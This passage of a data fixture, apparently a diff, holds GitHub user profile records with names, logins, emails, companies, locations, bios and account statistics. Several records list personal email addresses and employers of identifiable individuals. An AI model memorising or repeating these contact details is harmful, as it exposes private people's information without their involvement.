"nest_updated_at": "2024-09-12T00:35:14.085Z", + "name": "Nikolaj Aggeboe", + "login": "aggeboe", + "email": "nag@nine.dk", + "avatar_url": "https://avatars.githubusercontent.com/u/17447966?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-02-24T08:12:33Z", + "updated_at": "2024-09-05T09:53:14Z", + "node_id": "MDQ6VXNlcjE3NDQ3OTY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2082, + "fields": { + "nest_created_at": "2024-09-12T00:35:15.762Z", + "nest_updated_at": "2024-09-12T00:35:15.763Z", + "name": "Daniel Hay", + "login": "Danielhay016", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103133855?v=4", + "company": "Cybereason", + "location": "Israel ", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2022-04-06T16:02:16Z", + "updated_at": "2024-08-29T21:16:16Z", + "node_id": "U_kgDOBiWynw", + "bio": "Hi , I'm Daniel Hay \r\n🌱 I’m currently learning C, C++, Html, CSS, JavaScript, Java, Node, Express, Python\r\n\r\nContact info :\r\nlinkedin - Daniel Hay", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2083, + "fields": { + "nest_created_at": "2024-09-12T00:35:16.968Z", + "nest_updated_at": "2024-09-12T00:35:16.968Z", + "name": "Amy Chih", + "login": "AmyChihHi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/171004696?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-28T05:44:30Z", + "updated_at": "2024-08-27T02:09:55Z", + "node_id": "U_kgDOCjFTGA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2084, + "fields": { + "nest_created_at": "2024-09-12T00:35:18.168Z", + "nest_updated_at": "2024-09-12T00:35:18.168Z", + "name": "", + "login": "xiezhx9", + "email": "xiezhx9@mail3.sysu.edu.cn", + "avatar_url": "https://avatars.githubusercontent.com/u/169378332?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2024-05-09T15:19:17Z", + "updated_at": "2024-09-01T11:53:36Z", + "node_id": "U_kgDOChiCHA", + "bio": "try to be bk driver", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2085, + "fields": { + "nest_created_at": "2024-09-12T00:35:19.412Z", + "nest_updated_at": "2024-09-12T00:35:19.412Z", + "name": "HackermanDan", + "login": "hackerman-Dan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106969204?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2022-06-06T11:50:42Z", + "updated_at": "2022-06-25T10:48:02Z", + "node_id": "U_kgDOBmA4dA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2086, + "fields": { + "nest_created_at": "2024-09-12T00:35:20.711Z", + "nest_updated_at": "2024-09-12T00:35:23.277Z", + "name": "Tomas Hensrud Gulla", + "login": "tomahg", + "email": "tomas.h.gulla@novacare.no", + "avatar_url": "https://avatars.githubusercontent.com/u/1119118?v=4", + "company": "Novacare", + "location": "Norway", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2011-10-11T10:22:41Z", + "updated_at": "2024-09-10T11:11:40Z", + "node_id": "MDQ6VXNlcjExMTkxMTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "TomasGulla" + } +}, +{ + "model": "github.user", + "pk": 2087, + "fields": { + "nest_created_at": "2024-09-12T00:35:24.498Z", + "nest_updated_at": "2024-09-22T19:27:25.758Z", + "name": "", + "login": "jenspopp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11076541?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-02-19T15:22:06Z", + "updated_at": "2024-05-17T05:57:09Z", + "node_id": "MDQ6VXNlcjExMDc2NTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2088, + "fields": { + "nest_created_at": "2024-09-12T00:35:25.703Z", + "nest_updated_at": "2024-09-12T02:07:48.413Z", + "name": "", + "login": "ninianxing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103549973?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-04-13T02:57:20Z", + "updated_at": "2023-09-23T12:45:07Z", + "node_id": "U_kgDOBiwMFQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2089, + "fields": { + "nest_created_at": "2024-09-12T00:35:26.908Z", + "nest_updated_at": "2024-09-12T00:35:26.908Z", + "name": "", + "login": "Spawney", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44836744?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-11-07T11:27:37Z", + "updated_at": "2024-06-18T14:56:01Z", + "node_id": "MDQ6VXNlcjQ0ODM2NzQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2090, + "fields": { + "nest_created_at": "2024-09-12T00:35:28.138Z", + "nest_updated_at": "2024-09-12T00:35:28.138Z", + "name": "Mark Wardell @ Agfa", + "login": "mwardell-agfa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/159962771?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-02-13T21:53:30Z", + "updated_at": "2024-07-18T15:50:59Z", + "node_id": "U_kgDOCYjWkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2091, + "fields": { + "nest_created_at": "2024-09-12T00:35:28.529Z", + "nest_updated_at": "2024-09-22T20:24:29.263Z", + "name": "Nicolas Humblot", + "login": "nhumblot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15015617?v=4", + "company": "Siteflow", + "location": "Malakoff, France", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2015-10-07T13:41:08Z", + "updated_at": "2024-09-13T14:23:41Z", + "node_id": "MDQ6VXNlcjE1MDE1NjE3", + "bio": "", + "is_hireable": false, + "twitter_username": "nicolashumblot" + } +}, +{ + "model": "github.user", + "pk": 2092, + "fields": { + "nest_created_at": "2024-09-12T00:35:29.790Z", + "nest_updated_at": "2024-09-12T00:35:29.790Z", + "name": "Pierre", + "login": "Erylis21", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57070535?v=4", + "company": "", + "location": "Montpellier", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-10-27T16:47:39Z", + "updated_at": "2023-10-20T18:16:48Z", + "node_id": "MDQ6VXNlcjU3MDcwNTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2093, + "fields": { + "nest_created_at": "2024-09-12T00:35:31.431Z", + "nest_updated_at": "2024-09-12T00:35:31.431Z", + "name": "", + "login": "sathish94git", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/173897394?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-26T09:50:40Z", + "updated_at": "2024-06-26T09:50:50Z", + "node_id": "U_kgDOCl12sg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2094, + "fields": { + "nest_created_at": "2024-09-12T00:35:32.667Z", + "nest_updated_at": "2024-09-12T00:35:32.667Z", + "name": "", + "login": "hpriya19", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91110572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-09-21T04:59:17Z", + "updated_at": "2024-07-01T08:16:20Z", + "node_id": "MDQ6VXNlcjkxMTEwNTcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2095, + "fields": { + "nest_created_at": "2024-09-12T00:35:33.887Z", + "nest_updated_at": "2024-09-12T00:35:33.887Z", + "name": "Evelyn Jiang", + "login": "eve1ynjiang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115804711?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2022-10-14T14:32:37Z", + "updated_at": "2024-04-16T06:03:31Z", + "node_id": "U_kgDOBucKJw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2096, + "fields": { + "nest_created_at": "2024-09-12T00:35:35.104Z", + "nest_updated_at": "2024-09-19T07:31:46.357Z", + "name": "Sebastian M", + "login": "DocMoebiuz", + "email": "sebastian@mobiflight.com", + "avatar_url": "https://avatars.githubusercontent.com/u/86157512?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2021-06-19T13:52:17Z", + "updated_at": "2024-09-04T20:03:31Z", + "node_id": "MDQ6VXNlcjg2MTU3NTEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2097, + "fields": { + "nest_created_at": "2024-09-12T00:35:37.895Z", + "nest_updated_at": "2024-09-12T00:35:37.896Z", + "name": "Jesus Torres", + "login": "jmtt89", + "email": "jmtt89@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1221543?v=4", + "company": "", + "location": "Caracas,Venezuela", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 4, + "public_repositories_count": 99, + "created_at": "2011-11-26T06:36:51Z", + "updated_at": "2024-02-09T22:53:06Z", + "node_id": "MDQ6VXNlcjEyMjE1NDM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2098, + "fields": { + "nest_created_at": "2024-09-12T00:35:39.524Z", + "nest_updated_at": "2024-09-12T00:35:39.524Z", + "name": "", + "login": "martijndebruijn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5550144?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2013-09-26T14:03:53Z", + "updated_at": "2024-08-22T04:43:18Z", + "node_id": "MDQ6VXNlcjU1NTAxNDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2099, + "fields": { + "nest_created_at": "2024-09-12T00:35:40.708Z", + "nest_updated_at": "2024-09-12T00:35:40.708Z", + "name": "", + "login": "ankurga", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97887666?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-01-17T11:40:36Z", + "updated_at": "2024-06-07T07:31:55Z", + "node_id": "U_kgDOBdWlsg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2100, + "fields": { + "nest_created_at": "2024-09-12T00:35:41.952Z", + "nest_updated_at": "2024-09-12T00:35:41.952Z", + "name": "", + "login": "duvanquind", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122573788?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2023-01-12T22:06:05Z", + "updated_at": "2024-07-23T15:02:30Z", + "node_id": "U_kgDOB05T3A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2101, + "fields": { + "nest_created_at": "2024-09-12T00:35:43.142Z", + "nest_updated_at": "2024-09-20T18:23:54.104Z", + "name": "Juan Manuel Romera", + "login": "juanmanuelromeraferrio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9562899?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2014-11-05T02:16:35Z", + "updated_at": "2024-08-16T11:56:24Z", + "node_id": "MDQ6VXNlcjk1NjI4OTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2102, + "fields": { + "nest_created_at": "2024-09-12T00:35:45.967Z", + "nest_updated_at": "2024-09-12T00:35:45.967Z", + "name": "Alix", + "login": "alixwar", + "email": "alix.warnke@assaabloy.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5415786?v=4", + "company": "ASSA ABLOY Group Technology Team", + "location": "Stockholm, Sweden", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2013-09-09T06:54:08Z", + "updated_at": "2024-07-10T06:41:45Z", + "node_id": "MDQ6VXNlcjU0MTU3ODY=", + "bio": "This is my work account.\r\n\r\nNon-work account: alwa", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2103, + "fields": { + "nest_created_at": "2024-09-12T00:35:47.144Z", + "nest_updated_at": "2024-09-12T00:35:47.144Z", + "name": "Jesus", + "login": "crowster", + "email": "jese_koko@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8674781?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-09-06T02:35:20Z", + "updated_at": "2024-07-12T14:34:23Z", + "node_id": "MDQ6VXNlcjg2NzQ3ODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2104, + "fields": { + "nest_created_at": "2024-09-12T00:35:52.793Z", + "nest_updated_at": "2024-09-12T00:35:52.793Z", + "name": "", + "login": "lucky499", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45645005?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-12-06T01:36:40Z", + "updated_at": "2024-08-26T15:33:08Z", + "node_id": "MDQ6VXNlcjQ1NjQ1MDA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2105, + "fields": { + "nest_created_at": "2024-09-12T00:35:53.979Z", + "nest_updated_at": "2024-09-12T00:35:57.635Z", + "name": "Edward", + "login": "edward9944", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19667392?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-05-31T12:38:25Z", + "updated_at": "2024-08-04T14:32:00Z", + "node_id": "MDQ6VXNlcjE5NjY3Mzky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2106, + "fields": { + "nest_created_at": "2024-09-12T00:35:55.976Z", + "nest_updated_at": "2024-09-12T00:35:55.976Z", + "name": "", + "login": "sadeesh89", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80089267?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-03-05T06:19:22Z", + "updated_at": "2024-08-06T09:09:18Z", + "node_id": "MDQ6VXNlcjgwMDg5MjY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2107, + "fields": { + "nest_created_at": "2024-09-12T00:35:59.650Z", + "nest_updated_at": "2024-09-12T00:35:59.650Z", + "name": "Tanmoy", + "login": "tanmoyrsc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35572190?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-01-18T16:16:46Z", + "updated_at": "2024-08-23T04:35:25Z", + "node_id": "MDQ6VXNlcjM1NTcyMTkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2108, + "fields": { + "nest_created_at": "2024-09-12T00:36:00.899Z", + "nest_updated_at": "2024-09-12T00:36:00.899Z", + "name": "", + "login": "manoelacmn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104083139?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2022-04-20T14:18:45Z", + "updated_at": "2024-08-27T13:24:07Z", + "node_id": "U_kgDOBjQuww", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2109, + "fields": { + "nest_created_at": "2024-09-12T00:36:02.101Z", + "nest_updated_at": "2024-09-22T19:27:51.497Z", + "name": "Amit Chaurasiya", + "login": "ChaurAW1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/158049732?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-01-29T12:03:48Z", + "updated_at": "2024-08-16T09:59:53Z", + "node_id": "U_kgDOCWulxA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2110, + "fields": { + "nest_created_at": "2024-09-12T00:36:03.285Z", + "nest_updated_at": "2024-09-12T00:36:03.285Z", + "name": "", + "login": "HQPhamOrcl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/132680625?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-05-05T13:55:06Z", + "updated_at": "2024-09-09T15:06:39Z", + "node_id": "U_kgDOB-iLsQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2111, + "fields": { + "nest_created_at": "2024-09-12T00:37:08.603Z", + "nest_updated_at": "2024-09-22T19:29:25.854Z", + "name": "", + "login": "livingsocial", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/448881?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 73, + "created_at": "2010-10-21T21:38:36Z", + "updated_at": "2016-11-01T20:14:05Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjQ0ODg4MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2112, + "fields": { + "nest_created_at": "2024-09-12T00:37:12.643Z", + "nest_updated_at": "2024-09-22T19:29:28.388Z", + "name": "Jad Joubair", + "login": "jadjbr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48275583?v=4", + "company": "", + "location": "Barcelona", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-03-06T07:54:01Z", + "updated_at": "2022-01-29T19:10:29Z", + "node_id": "MDQ6VXNlcjQ4Mjc1NTgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2113, + "fields": { + "nest_created_at": "2024-09-12T00:37:13.490Z", + "nest_updated_at": "2024-09-12T00:37:13.490Z", + "name": "Thomas Cherry", + "login": "jceaser", + "email": "thomas.cherry@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6968137?v=4", + "company": "thomascherry.name", + "location": "Baltimore, Md", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 49, + "created_at": "2014-03-16T18:23:16Z", + "updated_at": "2024-07-27T03:11:11Z", + "node_id": "MDQ6VXNlcjY5NjgxMzc=", + "bio": "This is my personal repository but you might find some things related to my work at NASA.\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2114, + "fields": { + "nest_created_at": "2024-09-12T00:37:14.348Z", + "nest_updated_at": "2024-09-12T00:37:14.348Z", + "name": "", + "login": "wakil1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59300535?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-12-28T03:10:17Z", + "updated_at": "2024-08-18T16:07:15Z", + "node_id": "MDQ6VXNlcjU5MzAwNTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2115, + "fields": { + "nest_created_at": "2024-09-12T00:37:21.797Z", + "nest_updated_at": "2024-09-22T19:29:45.240Z", + "name": "Nikola Milosevic", + "login": "nikolamilosevic86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5192295?v=4", + "company": "Bayer Pharma R&D", + "location": "Belin, Germany", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 98, + "public_gists_count": 2, + "public_repositories_count": 52, + "created_at": "2013-08-08T18:49:20Z", + "updated_at": "2024-09-19T20:40:16Z", + "node_id": "MDQ6VXNlcjUxOTIyOTU=", + "bio": "Text mining & NLP & Machine learning & cyber-security researcher", + "is_hireable": true, + "twitter_username": "text_miner" + } +}, +{ + "model": "github.user", + "pk": 2116, + "fields": { + "nest_created_at": "2024-09-12T00:37:32.436Z", + "nest_updated_at": "2024-09-12T00:37:34.935Z", + "name": "Abhishek J M", + "login": "abhi-r3v0", + "email": "jmabhishek4@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9742431?v=4", + "company": "", + "location": "Mysuru, India", + "collaborators_count": 0, + "following_count": 50, + "followers_count": 130, + "public_gists_count": 0, + "public_repositories_count": 77, + "created_at": "2014-11-14T10:33:20Z", + "updated_at": "2024-03-27T04:11:22Z", + "node_id": "MDQ6VXNlcjk3NDI0MzE=", + "bio": "Lead Security Engineer | Security Research & Training", + "is_hireable": false, + "twitter_username": "HawkSpawn" + } +}, +{ + "model": "github.user", + "pk": 2117, + "fields": { + "nest_created_at": "2024-09-12T00:37:37.882Z", + "nest_updated_at": "2024-09-12T00:37:37.883Z", + "name": "Wesley A. Gahr", + "login": "voider1", + "email": "wesley.gahr@me.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6877671?v=4", + "company": "", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 18, + "public_gists_count": 4, + "public_repositories_count": 20, + "created_at": "2014-03-06T22:16:42Z", + "updated_at": "2024-08-29T08:27:13Z", + "node_id": "MDQ6VXNlcjY4Nzc2NzE=", + "bio": "Data Scientist @ ThreatFabric | Data Science & AI BSc @ Leiden University", + "is_hireable": false, + "twitter_username": "wesley_gahr" + } +}, +{ + "model": "github.user", + "pk": 2118, + "fields": { + "nest_created_at": "2024-09-12T00:37:38.702Z", + "nest_updated_at": "2024-09-12T00:37:38.702Z", + "name": "Loyd Jayme", + "login": "loydjayme25", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37318022?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2018-03-13T02:13:53Z", + "updated_at": "2019-05-02T12:53:04Z", + "node_id": "MDQ6VXNlcjM3MzE4MDIy", + "bio": "Aiming High !\r\n\r\nloydjayme1996@gmail.com\r\n\r\nshankz.akagami@yahoo.com.ph", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2119, + "fields": { + "nest_created_at": "2024-09-12T00:37:43.647Z", + "nest_updated_at": "2024-09-22T19:43:47.236Z", + "name": "OWASP Juice Shop", + "login": "juice-shop", + "email": "github.com@owasp-juice.shop", + "avatar_url": "https://avatars.githubusercontent.com/u/83415759?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 272, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2021-04-29T15:12:19Z", + "updated_at": "2024-09-01T11:32:49Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzNDE1NzU5", + "bio": "Insecure web application for security trainings, awareness demos, CTFs and as a guinea pig for security tools", + "is_hireable": false, + "twitter_username": "owasp_juiceshop" + } +}, +{ + "model": "github.user", + "pk": 2120, + "fields": { + "nest_created_at": "2024-09-12T00:37:46.807Z", + "nest_updated_at": "2024-09-12T00:37:46.807Z", + "name": "Hugo Pacheco", + "login": "hpacheco", + "email": "hpacheco@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/142078?v=4", + "company": "", + "location": "Portugal", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2009-10-20T11:14:46Z", + "updated_at": "2024-08-28T11:20:32Z", + "node_id": "MDQ6VXNlcjE0MjA3OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2121, + "fields": { + "nest_created_at": "2024-09-12T00:37:49.796Z", + "nest_updated_at": "2024-09-22T19:43:07.709Z", + "name": "Shubham Palriwala", + "login": "ShubhamPalriwala", + "email": "spalriwalau@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/55556994?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 197, + "public_gists_count": 0, + "public_repositories_count": 83, + "created_at": "2019-09-19T18:47:44Z", + "updated_at": "2024-09-19T12:06:16Z", + "node_id": "MDQ6VXNlcjU1NTU2OTk0", + "bio": "GSoC @OWASP @juice-shop '22 | GSoD @OpenMined '22 | Github Extern @Dhiway '22 | LFX @CNCF @Kyverno '21 | SoB @bitcoin '21 | Certified Ethical Hacker v11", + "is_hireable": true, + "twitter_username": "ShubhamInTech" + } +}, +{ + "model": "github.user", + "pk": 2122, + "fields": { + "nest_created_at": "2024-09-12T00:37:53.146Z", + "nest_updated_at": "2024-09-13T05:07:31.529Z", + "name": "Martina Kraus", + "login": "martinakraus", + "email": "kraus.martina.m@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6086902?v=4", + "company": "Kraus IT Consulting", + "location": "Karlsruhe", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 129, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2013-12-02T15:07:03Z", + "updated_at": "2024-08-19T15:49:23Z", + "node_id": "MDQ6VXNlcjYwODY5MDI=", + "bio": "Application Security Engineer@Kraus IT Consulting\r\n\r\nGoogle Developer Expert in Angular \r\n@ngHeidelberg, @AngularGirls", + "is_hireable": false, + "twitter_username": "MartinaKraus11" + } +}, +{ + "model": "github.user", + "pk": 2123, + "fields": { + "nest_created_at": "2024-09-12T00:37:53.547Z", + "nest_updated_at": "2024-09-13T05:07:31.848Z", + "name": "Thomas Phillip Breland", + "login": "thomasbreland", + "email": "thomas@breland.tech", + "avatar_url": "https://avatars.githubusercontent.com/u/17169643?v=4", + "company": "", + "location": "Georgia, USA", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-02-10T23:54:28Z", + "updated_at": "2024-08-14T04:24:11Z", + "node_id": "MDQ6VXNlcjE3MTY5NjQz", + "bio": "I like code.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2124, + "fields": { + "nest_created_at": "2024-09-12T00:37:56.527Z", + "nest_updated_at": "2024-09-22T19:43:12.737Z", + "name": "Thomas Reinecke", + "login": "ThReinecke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/126483857?v=4", + "company": "Johnson & Johnson", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-02-27T13:34:20Z", + "updated_at": "2024-08-06T12:09:22Z", + "node_id": "U_kgDOB4n9kQ", + "bio": "Software & Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2125, + "fields": { + "nest_created_at": "2024-09-12T00:37:59.956Z", + "nest_updated_at": "2024-09-12T00:37:59.956Z", + "name": "Anton Jeppsson", + "login": "ontanj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28560602?v=4", + "company": "Neodev", + "location": "Malmö, Sweden", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": 